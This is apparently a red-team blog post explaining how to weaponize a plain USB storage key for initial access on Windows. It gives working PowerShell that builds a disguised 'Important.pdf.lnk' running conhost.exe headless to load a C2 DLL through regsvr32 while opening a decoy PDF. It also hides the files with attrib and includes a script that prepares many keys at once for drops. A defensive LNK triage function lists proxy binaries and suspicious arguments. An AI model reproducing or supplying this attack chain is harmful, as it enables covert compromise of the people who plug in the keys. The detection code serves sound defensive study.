# How to weaponize a USB key like a real script kiddy for fun & profit
## Introduction
During a red team engagement, it can be useful to know how to weaponize a plain mass-storage USB key (no HID emulation, just files on a drive) to gain initial access. The well-known "HID" USB keys that type keystrokes have their drawbacks: the injected keystrokes depend on the victim's keyboard layout, and they can be stopped by controls such as HID device allow-listing. A mass-storage key can of course be blocked as well (for example by a GPO that disables removable storage), but I have not encountered that so far.
In this post we borrow from phishing via ISO images, a technique that originally worked because files inside a mounted ISO did not carry the Mark-of-the-Web and so escaped the checks that depend on it. A USB key gives us the same property for free: the Mark-of-the-Web is stored in an NTFS alternate data stream (Zone.Identifier), which a FAT32-formatted key cannot hold, so nothing on the key is treated as coming from the Internet.
The goal is to build the classic initial-access infection chain seen in most delivery techniques: a delivery mechanism carrying a container, which holds a trigger, a payload and a decoy:

```
DELIVERY(CONTAINER(TRIGGER + PAYLOAD + DECOY))
```

Here that becomes:

```
USB_DROP(USB(LNK + DLL + PDF))
```
## Weaponization time
To set up the attack we use Windows shortcut (.lnk) files. Their advantage is that Explorer never shows the .lnk extension, even when "Hide extensions for known file types" is turned off (the lnkfile registry key carries the NeverShowExt value), so a file named Important.pdf.lnk is displayed as Important.pdf. Additionally, the shortcut does not need to know which PDF reader is installed: cmd.exe resolves the file association itself, so typing the document name is enough to open it:

```
C:\Users\Noodle> Important.pdf
```
We also use the LOLBAS conhost.exe as a "proxy" binary: it is a signed Windows binary that launches whatever command line it is given, so our chain starts from a process that looks legitimate. Passed the --headless flag, conhost.exe runs the child without a visible console window, so the user sees nothing but the PDF. Note that this hides the window, not the processes: cmd.exe and regsvr32.exe still appear as children of conhost.exe in the process tree, and a conhost.exe started directly by explorer.exe with a command line of its own is unusual enough to be a detection opportunity.
Here is the execution graph:

```mermaid
graph TD
    R["USB key contains .LNK"]
    R -->|Launch| B["Beautiful PDF"]
    R -->|Execute| C["conhost.exe (or other LOLBAS)"]
    C -->|Execute via proxy binary| D["A malicious DLL"]
```
## Create the malicious .LNK
We use the following PowerShell code to generate an LNK that runs the LOLBAS conhost.exe:

```powershell
$obj  = New-Object -ComObject WScript.Shell
$link = $obj.CreateShortcut("Important.pdf.lnk")   # Explorer never shows the .lnk extension
$link.WindowStyle = 7                               # 7 = start minimized
$link.TargetPath  = "C:\Windows\System32\conhost.exe"
# Borrow a PDF icon from Edge so the shortcut looks like a document
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
# --headless: no console window. cmd starts both sides of the pipe at once, so the decoy
# opens immediately even if regsvr32 blocks inside the DLL. No WorkingDirectory is set, so
# the relative paths resolve against the folder the shortcut is launched from (the key's
# root) and no drive letter has to be hard-coded.
$link.Arguments = "--headless cmd /c regsvr32.exe ./msedge.dll | Important.pdf"   # Thanks 4 LOLBAS
$link.Save()
```
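Once the shortcut exists, it is worth reading it back the way an analyst would, both to check your own artefact and to see what a defender gets to work with: the target, the arguments (including the regsvr32 and --headless strings, which sit in plain text inside the file), the borrowed icon and the minimized window are all recoverable. The function below is an added example, not code from the original post; it uses the same WScript.Shell COM object as above, since CreateShortcut() on an existing .lnk loads it instead of creating a new one. The list of proxy binaries and the argument patterns are my own choices for illustration.

```powershell
# Added example: read back what a .lnk will actually do when double-clicked.
function Get-LnkTriage {
    param([Parameter(Mandatory)][string]$Path)

    $shell = New-Object -ComObject WScript.Shell
    $lnk   = $shell.CreateShortcut((Resolve-Path $Path).Path)   # loads the existing shortcut

    # Assumption: launchers that rarely belong in a shortcut that pretends to be a document
    $proxyBinaries = 'conhost.exe','cmd.exe','powershell.exe','pwsh.exe','mshta.exe',
                     'rundll32.exe','regsvr32.exe','wscript.exe','cscript.exe','msiexec.exe'

    $findings  = New-Object System.Collections.Generic.List[string]
    $shownName = [System.IO.Path]::GetFileNameWithoutExtension($Path)   # what Explorer displays
    $target    = [System.IO.Path]::GetFileName($lnk.TargetPath).ToLower()
    $iconFile  = ($lnk.IconLocation -split ',')[0]                      # "path,index" -> path
    $iconExe   = [System.IO.Path]::GetFileName($iconFile).ToLower()

    if ($shownName -match '\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)$') {
        $findings.Add("displayed name carries a document extension: $shownName")
    }
    if ($proxyBinaries -contains $target) {
        $findings.Add("target is a proxy/LOLBAS binary: $target")
    }
    if ($iconExe -and $iconExe -ne $target) {
        $findings.Add("icon borrowed from $iconExe but target is $target")
    }
    if ($lnk.Arguments -match '--headless|regsvr32|rundll32|\.dll\b|mshta|-enc|downloadstring') {
        $findings.Add("suspicious arguments: $($lnk.Arguments)")
    }
    if ($lnk.WindowStyle -eq 7) {
        $findings.Add("window starts minimized")
    }

    [pscustomobject]@{
        File       = $Path
        Target     = $lnk.TargetPath
        Arguments  = $lnk.Arguments
        Icon       = $lnk.IconLocation
        WorkingDir = $lnk.WorkingDirectory
        Findings   = $findings
        Suspicious = $findings.Count -ge 2   # two independent hints are enough to look closer
    }
}

# Usage: triage every shortcut at the root of a mounted key
Get-ChildItem E:\*.lnk | ForEach-Object { Get-LnkTriage $_.FullName } | Format-List
```

Run against the Important.pdf.lnk generated above, every one of the five checks fires. That is the trade-off of this build: the chain is quiet for the user, but the shortcut itself is a small, fully parseable file, and none of its giveaways (conhost.exe target, --headless and regsvr32 in the arguments, Edge icon on a conhost target) are needed by a legitimate document shortcut.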
## Create the malicious DLL and hide your shit
Now that we have an LNK that loads the malicious DLL (or any other payload type; see mgeeky's training for alternatives), we just need to create the DLL. We can generate one with our favourite C2 (Sliver here) or write one from scratch. Keep in mind how regsvr32 uses it: it loads the DLL, so DllMain runs, and then calls the exported DllRegisterServer function. If that export is missing, regsvr32 displays an error dialog unless it is invoked with /s, which would give the game away to the user.

Then we hide the files the user should not see (the legitimate PDF and the DLL) with attrib. Note that +h alone is undone as soon as the user enables "Show hidden files"; adding +s as well marks them as protected operating system files, which Explorer hides under a separate setting.

```
attrib +h Important.pdf
attrib +h msedge.dll
```
## Execution
Now that everything is ready, we have a weaponized USB drive. Given the simplicity of this technique, it is possible to script the whole build and prepare several drives at once, and since the hardware is cheap, dozens or even hundreds of keys do not require significant financial resources.
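Putting the three steps together, here is an added example of such a build script (mine, not the original post's): it stages the decoy and the DLL on each key, writes the same shortcut as in the LNK section directly onto the drive, hides the supporting files, and verifies that exactly one file is left visible. It assumes a local staging folder containing Important.pdf and the C2-generated msedge.dll; the drive letters are passed on the command line.

```powershell
# Added example: build-keys.ps1, e.g.  .\build-keys.ps1 -Drives E:,F:,G:
# Assumes .\staging\Important.pdf (decoy) and .\staging\msedge.dll (C2 DLL) already exist.
param(
    [Parameter(Mandatory)][string[]]$Drives,
    [string]$Staging = ".\staging",
    [string]$Decoy   = "Important.pdf",
    [string]$Dll     = "msedge.dll"
)

foreach ($file in $Decoy, $Dll) {
    if (-not (Test-Path (Join-Path $Staging $file))) { throw "missing $file in $Staging" }
}

foreach ($drive in $Drives) {
    $root = "$drive\"
    if (-not (Test-Path $root)) { Write-Warning "$drive not mounted, skipping"; continue }

    # Drop the decoy and the payload at the root of the key
    Copy-Item (Join-Path $Staging $Decoy) (Join-Path $root $Decoy) -Force
    Copy-Item (Join-Path $Staging $Dll)   (Join-Path $root $Dll)   -Force

    # Same shortcut as in the LNK section, written straight to the key
    $shell = New-Object -ComObject WScript.Shell
    $lnk = $shell.CreateShortcut((Join-Path $root "$Decoy.lnk"))
    $lnk.TargetPath   = "C:\Windows\System32\conhost.exe"
    $lnk.Arguments    = "--headless cmd /c regsvr32.exe ./$Dll | $Decoy"
    $lnk.WindowStyle  = 7
    $lnk.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13"
    $lnk.Save()

    # Hide the supporting files; +s keeps them hidden even with "Show hidden files" enabled
    attrib +h +s (Join-Path $root $Decoy)
    attrib +h +s (Join-Path $root $Dll)

    # Check: Explorer should show exactly one file, and it should look like the decoy
    $visible = Get-ChildItem $root -File |
        Where-Object { -not ($_.Attributes -band [IO.FileAttributes]::Hidden) }
    if ($visible.Count -ne 1 -or $visible[0].Name -ne "$Decoy.lnk") {
        Write-Warning "$drive: unexpected visible files: $($visible.Name -join ', ')"
    } else {
        Write-Host "$drive ready: $($visible[0].Name) (displayed as $Decoy)"
    }
}
```

The final check is there because the whole trick depends on the user seeing a single PDF-looking file; a forgotten attrib, or a leftover file from a previous build, is exactly the kind of mistake that is easy to make when preparing twenty keys in a row.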
## Inspiration
To write this article and learn the technique, I read the technical references listed below:
- File smuggling
- Advanced USB key phishing
- Modifying .lnk Shortcuts
- Red-Teaming Tool Being Abused by Malicious Actors
- LOLBAS
- WarCon22 - Modern Initial Access and Evasion Tactics
- Recreating an ISO Payload for fun and no profit
- Deriving intelligence from LNK files
## Special thanks
- Euz for proofreading
## The end
Here is my first article. Admittedly, it discusses a fairly simple topic and doesn't cover anything new, but I found it interesting to share this technique. Feel free to give me feedback.